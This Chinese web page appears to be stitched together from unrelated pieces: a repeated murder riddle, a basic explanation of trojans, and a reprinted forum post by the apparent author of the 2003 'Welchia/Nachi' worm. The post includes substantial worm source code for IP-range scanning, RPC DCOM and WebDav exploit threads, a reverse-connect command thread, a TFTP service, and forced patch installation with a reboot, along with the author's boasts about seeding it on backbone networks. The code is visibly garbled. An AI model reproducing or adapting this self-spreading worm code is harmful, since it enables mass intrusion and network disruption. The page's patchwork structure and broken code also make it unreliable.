黑客疫苗（中国黑客印度疫苗）

疫苗怎样被黑客攻击的

李娜，311可分成3和11，3和11分别对照化学元素周期表得到li（锂 ）na（钠），li na也就指李娜，则得出李娜是凶手。

为什么电脑病毒杀不完？

这是因为电脑中顽固木马病毒，而已安装的杀毒软件病毒库没有此木马病毒的特征导致的。此木马病毒一直在后台运行，不断从网络上下载新的病毒到本地电脑。所以电脑会不断提示有病毒，总也杀不完。解决方法：更新杀毒软件病毒库到最新。

木马病毒简介：

“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。

它是指通过一段特定的程序（木马程序）来控制另一台计算机。木马通常有两个可执行程序：一个是客户端，即控制端；另一个是服务端，即被控制端。植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。

运行了木马程序的“服务器”以后，被种者的电脑就会有一个或几个端口被打开，使黑客可以利用这些打开的端口进入电脑系统，安全和个人隐私也就全无保障了！木马的设计者为了防止木马被发现，而采用多种手段隐藏木马。

木马的服务一旦运行并被控制端连接，其控制端将享有服务端的大部分操作权限，例如给计算机增加口令，浏览、移动、复制、删除文件，修改注册表，更改计算机配置等。随着病毒编写技术的发展，木马程序对用户的威胁越来越大，尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己，使普通用户很难在中毒后发觉。

一个科学家正在做实验研究疫苗，这时一个黑客夺走刚刚研制成功的解毒蛋清，教授因揭开了此人面具被杀死

李娜，311可分成3和11，3和11分别对照化学元素周期表得到li（锂 ）na（钠），li na也就指李娜，则得出李娜是凶手。

黑客一般入侵什么人？

一般有三种

1、敲诈勒索，有利可图

2、得罪了人，报复入侵

3、偷偷放一些为自己谋利的内容

《冲击波杀手》那个黑客是谁？

这个问题警察也想知道 也没人在网上公布

给您转一篇文章 也许对您有用

冲击波杀手的作者网上现身

前言：“冲击波”蠕虫爆发后，大量个人主机及服务器遭受侵袭，各大安全公司，杀毒厂商纷纷推出各种解决方案，不料短短几日内，又出现了来历不明的新蠕虫，经过一些安全专家的反向编译和分析，惊讶的发现，该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁，而且该蠕虫还具有定时自毁功能，显然作者的目标还是有一定的善意因素，但是蠕虫毕竟是蠕虫，因为大量icmp包的发送，还是能够给企业局域网络带来极大的压力，就此，对蠕虫的危害性依然要保持极大的关注和警惕，相关文章可以参见

8月20日，蠕虫作者突然现身，出现在某安全论坛，以下是该作者论坛上声明的转载，并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了～～ 虫虫四个小时之内已经完成了任务～～～ 不得不写这豆腐块～～～

char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~

Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";

偶：小地方小公司小小程序员

偶从不玩安全的，临时抱佛脚，看了些资料，仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ，虽然偶临时玩安全的即兴之作亦很烂

~~~

B 看不惯国内某几家放毒公司的商业炒作，发网难财，违背良心，误导民众

偶就帮你丫的除光了虫虫，打光了补丁，没想到他丫的误导的更变态~~~ 你丫的方脑壳

~~

C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~

D VirusBOy 兄，baby 可不是情人吆，偶家小子两岁就开始跟偶抢机器了~~

E 长了这么大,算首次报效社会吧~~~

F 几年？进去就是了，不就是个坐吗， 切~~~ 偶是吓大的!

======================================================

0 chian 系 china 笔误~~ 敲的快了，某个指头先到~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改

(声明：谁也没给偶，偶从一被人遗忘的公开程序中sniffer的,谢两位)

此shellcode 新进程建在svchost下，就一个Call Ebx 通杀了 all 2k xp

他丫的，还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死 有 Tftpd.exe, 干吗不用，虽然偶看过 Tftp 协议，练习写过~~~

4 某年某月某日某时某刻，

溜出国门，辗转借了几台 Xeon™ 4 cpus, 2g memory 机器

架起 2000 线程的 WebDav 投放玩具，对准某国骨干的几个B段

10 分钟内投放了三四百个种子(早知道有这么多，就换个玩法 ~~~

5 发icmp包是为了提高搜索效率，算唯一的危害了~~~ 刺激一下也好~~~

打补丁的虫，杀虫的虫，再不有点儿小危害就丢尽了虫虫家族的脸~~~

//偶婆婆, 烂代码~~~ 将就看吧~~~

BOOL DoServicePackFunction()

{

DWORD nSystemVer = Win2000OrXp();

if ( !( nSystemVer == 0 || nSystemVer == 1) )

return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )

return FALSE; //已经安装了

//识别语言版本

int nLanguageID;

unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();

WORD wMain = PRIMARYLANGID(lcid);

WORD wSub = SUBLANGID(lcid);

if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en

nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~

//管不了小欧洲~~ 俄罗斯牛人有自己的玩法

~~

else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn

nLanguageID = 1; //就是为这个来的~~

else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw

nLanguageID = 2; //同胞骨肉的忙,一定要帮~~

else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp

nLanguageID = -1; //偶好有干掉鬼子机器的冲动！

//罢了，冤冤相报何时了~~~ 希望他丫的自新

~~~ 再玩火就灭了他丫的~~

else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr

nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~

else{

nLanguageID = -1;

}

if ( nLanguageID == -1)

return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~

if ( !nSystemVer ) { // 2k

if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )

return FALSE;

}

else{

if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )

return FALSE;

}

char szExec[180];

sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );

if ( hProcess == NULL )

return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内

未完成

TerminateProcess(hProcess,1);

CloseHandle(hProcess);

DeleteFile(szServicePack);

return FALSE;

}

CloseHandle(hProcess);

Sleep(15000);

DeleteFile(szServicePack);

if ( ReadRegServicePack(nSystemVer) ) {

ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot

it~~~

Sleep(20000); //说偶重启有过？ 不重启补丁无效，

找 Bill该死 说去~~~

}

return TRUE;

}

// IN: 始ip, B段数量, 是否随机，是否换WebDav //更烂~~~ 凑合着看~~~

void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL

bWebDav)

{

HANDLE hThread = NULL;

BOOL bFirst = TRUE;

u_long uComp;

for (int i=0;i (nBCount * 256 * 256); i++){

if ( bRand )

uComp = MakeRandIp();

else

uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标，免得目标中招后，再玩就把下一代干掉了，不破坏的好

~~~

(BYTE)uComp == 0xc5 ||

(BYTE)(uComp8) == 0xc5 ||

(BYTE)(uComp16) == 0xc5 ||

(BYTE)(uComp24) == 0xc5 ||

(WORD)uComp == 0x9999 ||

(WORD)(uComp8) == 0x9999 ||

(WORD)(uComp16) == 0x9999 )

continue;

u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败，再尝试一次

Sleep(100);

myPara = new u_long;

}

if ( myPara ){

if ( hThread )

CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)

hThread =

CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);

else

hThread =

CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);

Sleep(2);

}

//添加此处代码，避免首次执行时，线程中的

InterlockedIncrement(g_CurThreadCount) 未来得及运行，一次性建立了N个线程的

bug!

if ( bFirst (i = nMaxThread) ){

Sleep(2000);

bFirst = FALSE;

}

while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心，

玩过了~~~

Sleep(2);

}

Sleep(60000);

}

//服务模式和控制台模式公用主程序

void DoIt()

{

WSADATAwsd;

if(WSAStartup(MAKEWORD(2,2),wsd)!=0)

return;

//杀蠕虫

KillMsblast();

//卸载

SYSTEMTIME st;

GetLocalTime(st);

if ( st.wYear == 2004 ){

MyDeleteService(szServiceName);

MyDeleteService(szServiceTftpd);

RemoveMe();

ExitProcess(1); //其实不必，RemoveMe()中借用了前辈的代码，2k下，退出程序时将

自身文件删除了

}

srand( GetTickCount() );

memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));

//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补

丁已经打够了!~~~

//准备WebDav发送缓冲区

do{

pWebDavExploitBuffer = new char[68000];

Sleep(100);

}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹

PressWebDavBufferOnce();

PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口

//打补丁

DoServicePackFunction();

//建立接收线程

DWORD dwThreadID;

HANDLE

hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L

PVOID)NULL,0,dwThreadID);

if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞，有反连，再建线程处理之,

同时处理多个反连

return;

CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){

Sleep(1000);

InstallTftpService();

Sleep(1000);

MyStartService(szServiceTftpd);

}

Sleep(2000); //等待接收线程中的全局 rand bind port

u_long ulIP;

for(;{ //估算了一下，普通机器2小时一循环

//首先扫描本ip段

CheckOnlienAndPressData();

ulIP = ntohl(inet_addr(szLocalIp));

ulIP = 0xffff0000;

BeginExploitFunction( ulIP, 1, 0, 0);

//再扫描本ip前后3个段

CheckOnlienAndPressData();

if ( rand() % 2)

ulIP += 0x00010000;

else

ulIP -= 0x00030000;

BeginExploitFunction( ulIP, 3, 0, 0);

//再扫描WebDav一个段,跳出 135 syn封锁

CheckOnlienAndPressData();

ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,

立即采取补救措施~~~ sorry~~~

BeginExploitFunction( ulIP, 1, 0, 1);

//再扫描随机的IP, 数量1个 B段, rpc or webdav

CheckOnlienAndPressData();

if ( rand() % 2)

BeginExploitFunction( ulIP, 1, 1, 0);

else

BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~

KillMsblast();

}

//WSACleanup();

}

--------------------------------------------------------------------------------------------------

为方便阅读，增加几个补充说明

1.flashsky 创始人之一，启明星辰安全专家，擅长古体诗词，7月中公开rpc漏洞利用方式源代码，公开溢出分析报告，造成全球安全领域的震动，冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友，水平不咋地，不过你最好别招惹他，DDOS你一把也够受的。

3.某安全公司安全专家评论，该帖子内容基本属实，蠕虫源代码已经得到确认。

瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过，这个新病毒生来就是原冲击波病毒的克星。

瑞星反病毒工程师分析说：该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉，并在系统内值入，预防冲击波病毒的疫苗。

然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址，并通过RPC漏洞快速传播自己，消耗大量CPU和网络资源，并且有可能会导致系统死机。该病毒的作者似乎无意作恶，病毒设定在2004年自行毁灭。

由于该病毒采用PING方式进行探测，只感染能够PING通的机器，因此瑞星反病毒工程师提醒广大用户，设置防火墙的规则，禁止ping，这样可以有效防止该病毒的入侵。